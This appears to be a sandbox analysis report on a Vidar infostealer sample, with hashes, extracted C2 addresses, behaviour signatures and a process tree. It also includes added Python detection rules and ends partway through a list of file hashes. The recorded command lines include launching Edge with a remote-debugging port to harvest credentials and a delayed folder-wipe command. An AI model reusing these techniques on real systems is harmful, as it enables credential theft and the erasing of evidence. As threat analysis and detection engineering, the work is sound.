Analysis

  • max time kernel
    129s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250502-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20250502-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    30/06/2025, 17:46

General

  • Target

    5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe

  • Size

    951KB

  • MD5

    600623ba27769989d981904debcc3774

  • SHA1

    08b03982c2c7fe5b35f1379bca1e8832cb294764

  • SHA256

    5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd

  • SHA512

    42ede2b6dd77ab72afa1449e5bc2710c74e586c1468126814787c0b7ad6bfe69f6c0c58cc7b212594d217146c47c89af4f890464f726648ca9f0ea648a739328

  • SSDEEP

    12288:G6yQn1ME0VKFY8eoVEaXltnHGsdCBh46dV51satxZ7YT928nIpSm8satxZ7YT92l:puE0Vsb8ImfhRsatx428Issatx428I

Malware Config

Extracted

Family

vidar

Version

14.4

Botnet

5838abba2c7ca0756153b41aab8534b5

C2

https://t.me/q0l0o

https://steamcommunity.com/profiles/76561199872233764

Attributes
  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/137.0.0.0 Safari/537.36 OPR/122.0.0.0

Signatures

  • Detect Vidar Stealer 40 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Uses browser remote debugging 2 TTPs 3 IoCs

    Can be used to control the browser and steal sensitive information such as credentials and session cookies.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe
    "C:\Users\Admin\AppData\Local\Temp\5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:680
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4128
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        3⤵
        • Checks processor information in registry
        • Enumerates system info in registry
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:3192
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff88865dcf8,0x7ff88865dd04,0x7ff88865dd10
          4⤵
          PID:4632
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2004,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2000 /prefetch:2
          4⤵
          PID:4756
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2224,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2236 /prefetch:3
          4⤵
          PID:4924
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2372,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2516 /prefetch:8
          4⤵
          PID:4528
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3168 /prefetch:1
          4⤵
          PID:4704
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3204 /prefetch:1
          4⤵
          PID:4612
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4192,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4244 /prefetch:2
          4⤵
          PID:4844
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4520,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4572 /prefetch:1
          4⤵
          PID:3740
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5112,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5104 /prefetch:8
          4⤵
          PID:1700
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5432,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5364 /prefetch:8
          4⤵
          PID:3668
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5100,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5136 /prefetch:8
          4⤵
          PID:5480
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5676,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5692 /prefetch:8
          4⤵
          PID:4044
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5712,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5844 /prefetch:8
          4⤵
          PID:5804
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5136,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5868 /prefetch:8
          4⤵
          PID:2552
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "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
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5684
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3sqz0ne1\3sqz0ne1.cmdline"
          4⤵
          PID:2900
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES732C.tmp" "c:\Users\Admin\AppData\Local\Temp\3sqz0ne1\CSCB76A280560FE48389084FC30EF7E3DC5.TMP"
            5⤵
            PID:1500
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Checks processor information in registry
        • Enumerates system info in registry
        • Modifies registry class
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        PID:2940
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x260,0x7ff87810f208,0x7ff87810f214,0x7ff87810f220
          4⤵
          PID:2884
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1880,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=2244 /prefetch:3
          4⤵
          PID:548
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2208,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:2
          4⤵
          PID:1544
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2476,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=2456 /prefetch:8
          4⤵
          PID:1788
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3464,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:1
          4⤵
          • Uses browser remote debugging
          PID:2872
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:1
          4⤵
          • Uses browser remote debugging
          PID:1156
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5048,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=5288 /prefetch:8
          4⤵
          PID:3652
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5108,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=5256 /prefetch:8
          4⤵
          PID:1940
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5956,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=5964 /prefetch:8
          4⤵
          PID:4832
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\2nopz" & exit
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2092
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 11
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:4440
  • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
    1⤵
    PID:4712
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
    1⤵
    PID:4024
  • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
    1⤵
    PID:3256
  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
    1⤵
    PID:1784
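
Three behaviours in the tree above separate this run from ordinary browser activity: a bare MSBuild.exe spawned by the sample from %TEMP% with no project to build (the host the stealer is injected into), msedge.exe started by that MSBuild.exe with --remote-debugging-port=9223 (the DevTools route to cookies and saved credentials), and a cmd.exe that waits on timeout.exe before wiping C:\ProgramData\2nopz. The Python below is an added example, not part of the sandbox report and not any vendor's rule set. It encodes those three patterns as process-creation rules and runs them over events constructed from the PIDs and command lines shown above; the pid/ppid/image/cmdline fields are an assumed normalised schema (any Sysmon EID 1 or EDR process-creation feed maps onto it), and the sample's own parent PID is a placeholder because the report does not record it.

```python
"""Process-tree detections for the three behaviours in the report above.

Added example, not part of the sandbox report and not any vendor's rule set.
EVENTS is constructed from the PIDs and command lines in the Processes section;
the pid/ppid/image/cmdline fields are an assumed normalised schema, and the
sample's parent PID (0) is a placeholder because the report does not record it.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "firefox.exe"}
# Signed .NET hosts commonly chosen as targets for process hollowing; the
# report shows MSBuild.exe started with no project file at all.
INJECTION_HOSTS = {"msbuild.exe", "regasm.exe", "regsvcs.exe", "installutil.exe"}
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\users\\public\\", "\\temp\\")

REMOTE_DEBUG = re.compile(r"--remote-debugging-(?:port|pipe)(?:=(\d+))?", re.I)
PROJECT_FILE = re.compile(r"\.(?:cs|vb|fs)?proj\b|\.sln\b", re.I)
DELAYED_RD = re.compile(
    r"timeout(?:\.exe)?\s+(?:/t\s+)?\d+.*?&\s*rd\s+/s\s+/q\s+\"?([^\"&]+)", re.I)


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag(procs: List[Proc]) -> List[Tuple[int, str, str]]:
    """Return (pid, rule, detail) for each process that trips one of three rules."""
    by_pid: Dict[int, Proc] = {p.pid: p for p in procs}
    findings: List[Tuple[int, str, str]] = []
    for p in procs:
        name = basename(p.image)
        parent = by_pid.get(p.ppid)
        pname = basename(parent.image) if parent else ""

        # Rule 1: a browser given a DevTools remote-debugging endpoint by a
        # non-browser parent. Child browser processes inherit the flag (see the
        # msedge renderers above), so the parent check keeps them out.
        m = REMOTE_DEBUG.search(p.cmdline)
        if m and name in BROWSERS and pname not in BROWSERS:
            port = m.group(1) or "pipe"
            findings.append((p.pid, "browser_remote_debugging",
                             f"{pname or 'unknown'} -> {name} ({port})"))

        # Rule 2: a signed .NET host launched from a user-writable path with
        # nothing to build or install: no legitimate work, a hollowing host.
        if (name in INJECTION_HOSTS and parent is not None
                and any(seg in parent.image.lower() for seg in USER_WRITABLE)
                and not PROJECT_FILE.search(p.cmdline)):
            findings.append((p.pid, "suspicious_injection_host", f"{pname} -> {name}"))

        # Rule 3: delayed directory wipe, the stealer cleaning its staging folder.
        m = DELAYED_RD.search(p.cmdline)
        if name == "cmd.exe" and m:
            findings.append((p.pid, "delayed_cleanup", m.group(1).strip()))
    return findings


# Constructed from the report's process tree (only the fields the rules need).
SAMPLE = (r"C:\Users\Admin\AppData\Local\Temp"
          r"\5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe")
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
EVENTS = [
    Proc(680, 0, SAMPLE, f'"{SAMPLE}"'),                   # ppid 0: not in the report
    Proc(4128, 680, MSBUILD, f'"{MSBUILD}"'),
    Proc(3192, 4128, CHROME, f'"{CHROME}"'),
    Proc(2940, 4128, EDGE,
         f'"{EDGE}" --remote-debugging-port=9223 --profile-directory="Default"'),
    Proc(2872, 2940, EDGE,                                 # renderer inherits the flag
         f'"{EDGE}" --type=renderer --remote-debugging-port=9223 --renderer-client-id=6'),
    Proc(2092, 4128, r"C:\Windows\SysWOW64\cmd.exe",
         r'"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\2nopz" & exit'),
    Proc(4440, 2092, r"C:\Windows\SysWOW64\timeout.exe", "timeout /t 11"),
]

if __name__ == "__main__":
    for pid, rule, detail in flag(EVENTS):
        print(f"{pid:>5}  {rule:<26} {detail}")
```

Rule 1 keys on the parent rather than on the flag alone: every Edge renderer above inherits --remote-debugging-port=9223, and developers or test automation (a node.exe or python.exe parent driving Puppeteer or Selenium) start browsers this way legitimately, so in production it is a hunting query to be tuned with an allow-list of parents, not a blocking detection. Rule 2 is the stronger signal in this run: MSBuild.exe with no project file and a parent in a user-writable path has no legitimate purpose.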

Network

MITRE ATT&CK Enterprise v16

Downloads

  • C:\ProgramData\2nopz\sj5pp8
    • Filesize
      288KB
    • MD5
      8900ece47d3bd26ea398d48fecb34fa8
    • SHA1
      b393c8fdafb3a733883caf02d347f22e8e19285a
    • SHA256
      94009c06a22ae20b38a9bfeccd9aba3ad976a93531aebd36cb481ebf28eb32ea
    • SHA512
      ba5e26519249915e7b5b55c371bc8e582d9da74b90790b5ce2f0cb4fa399a520a780dbe0e31d126c661bf006fbcd0fe83cb394a82217d6aacd574d94a1355548

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
    • Filesize
      2B
    • MD5
      d751713988987e9331980363e24189ce
    • SHA1
      97d170e1550eee4afc0af065b78cda302a97674c
    • SHA256
      4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
    • SHA512
      b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
    • Filesize
      79KB
    • MD5
      115d9ce05d47a739e587d36f9c7d1a9e
    • SHA1
      b64cb2738901da0b9695025ea32b90f213c69a92
    • SHA256
      28bbe5a1f0a5060281fdf42a90c8d02de1352786aba1aa4e171c7ccd7e242f22
    • SHA512
      835673212ac7449f17ac26efc1572715ebbdc3389a9f6a5cd053f481936a1bc52cde491453a687623de4ce70a0c54a461ffac282324635b577a70dd9f0d91bf1

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
    • Filesize
      280B
    • MD5
      36326fcbb6119326e7c8aa24c4156548
    • SHA1
      ed128a9727e1d58b970e732b8c66fc827b18372b
    • SHA256
      ac41191dcaf36d91f7bd9a077bc59b1bd7218daa27b263d1da6a548f58264987
    • SHA512
      ed5c79f1edc0c65a1cf0ace91ea5538245c1569c3b25ae3cdf033ffcb55d37e7b09baec36570e82fc1525c24224cea08a53abab7e52db6376f48f099ffefd1fe

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\0fc6f7c5-ba86-48f0-8560-dff2f42d25af\index-dir\the-real-index
    • Filesize
      2KB
    • MD5
      511104f39140f1055bf70ff41657eefb
    • SHA1
      a9f1a8a91e54edb2b8e1d386d6f4acfe24016b12
    • SHA256
      64d803b3b0b846aebce7e9682d84e312ebc1440cb173fc4d1364a9e75dece58c
    • SHA512
      f744a512c3b2e030d6a387b4c961a79c5562c0924746220a02324ef6b5a9ce1b58d2926a2515b61c76798a7db46a5c5515072bd6deca30cffd6cc2fe5294f381

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\0fc6f7c5-ba86-48f0-8560-dff2f42d25af\index-dir\the-real-index~RFe5798c5.TMP
    • Filesize
      2KB
    • MD5
      bcc8812ad0f8f37dd7151537c2c32f8e
    • SHA1
      89d561bd857bbf2f02ae44253b2181431cc85871
    • SHA256
      d2a8d6ca44819eb7909bedec7f74f68ae1387866adcedebd320d31f9a1b73d56
    • SHA512
      72d6a39f18058bcdd3c2ee447fe13bcb43210aeeeca1b2e625e6407e86013e5da974c8f8a64a1c2224ef793c552b46fe458b1c9114f4b2bd81b96a9a951c7eeb

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\b2667d68-3d19-4df9-ab2b-65f3cd37f941.tmp
    • Filesize
      1B
    • MD5
      5058f1af8388633f609cadb75a75dc9d
    • SHA1
      3a52ce780950d4d969792a2559cd519d7ee8c727
    • SHA256
      cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
    • SHA512
      0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
    • Filesize
      39KB
    • MD5
      08a98ed9e14066a563da4f73f185776e
    • SHA1
      782731b0e39a3e6e89aefc6021909f24e5ae4bb2
    • SHA256
      c3c670af75701aed6877ef516026d7291d38c35f29447a11be18b18e71254ab4
    • SHA512
      ee2c553690e0480d40a38fcde06e3c4ee1d892cff2fc255938d32e5f0af771a6419ec19e6120ed921dabce8c4f4f05cb3d9ddd9eeb8cefbb2641db134a59f4fc

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
    • Filesize
      39KB
    • MD5
      6a453e9c77c3e7668179bc499e5dde17
    • SHA1
      4f8a566f5826525ecadd1bf0a74e25088d1071c0
    • SHA256
      802682aaecc1a4e1c0d713ac9b3d6a6d43f10f7f2ccfc59871f9fd9856fa23f1
    • SHA512
      ecd07a7f5f40d919303f005f43ff4fbed915fcc53a21b2e0cdd7e0d4700c8c122bba34a5b37f67720919ecade456de91139a02c82efddf527dcee3b209232d8a

  • C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                Filesize

                                                                2KB

                                                                MD5

                                                                cdaa77769ee24f4183ebab68c3e00ed5

                                                                SHA1

                                                                a578c607b1e8b3307d52d53f61e80c4e392b5e52

                                                                SHA256

                                                                178e41f0088fb20bd0069622e91cac6817fc3811baf6c5c95c5e03fc01a4dd6c

                                                                SHA512

                                                                4166e3eb55ddd445cbb361bd4d97b347f6cd2bc2f2fbee9d338e1f10ebfddfa37c45e3446767321ffb987272bfd8581ade8ea364d98dfeef34b86efb44a06cc3

                                                              • C:\Users\Admin\AppData\Local\Temp\3sqz0ne1\3sqz0ne1.dll

                                                                Filesize

                                                                4KB

                                                                MD5

                                                                c9502303989cda40d7d8a516662853bb

                                                                SHA1

                                                                aba250755699cd1e8438f17d80d11168e4e5b7f2

                                                                SHA256

                                                                6e5507af17a40fac4faa9f25db52a0d699456c699e8215e5f32c8c678d131c8b

                                                                SHA512

                                                                321462ba3f204fb2298895998aefa3ebf5dfecf62bb99d9064008f2cc4bb577abdceaf6b597d5f73d70135261c7bb6628f5d830fecd6fce58699f84cdb1effc3

                                                              • C:\Users\Admin\AppData\Local\Temp\RES732C.tmp

                                                                Filesize

                                                                1KB

                                                                MD5

                                                                d77f5ff08ccbc25bf9bb42761b94e7f9

                                                                SHA1

                                                                9b8bcdc7b692358b22c8ac3c1facab7e4c86f8ed

                                                                SHA256

                                                                7fb70e544e4d4be22ebcdd94e7fb8e0ec2eeed6e5474a73302a1e3e0adedc46c

                                                                SHA512

                                                                30da3a110ad087d5b17d1876c865d356257772daa518623f1b66d1aa65a95bc8e86d08135e30bc566d765e2f612d57c2a6d94fe06f732671de4c88594fde0b18

                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s05mvnmi.soc.ps1

                                                                Filesize

                                                                60B

                                                                MD5

                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                SHA1

                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                SHA256

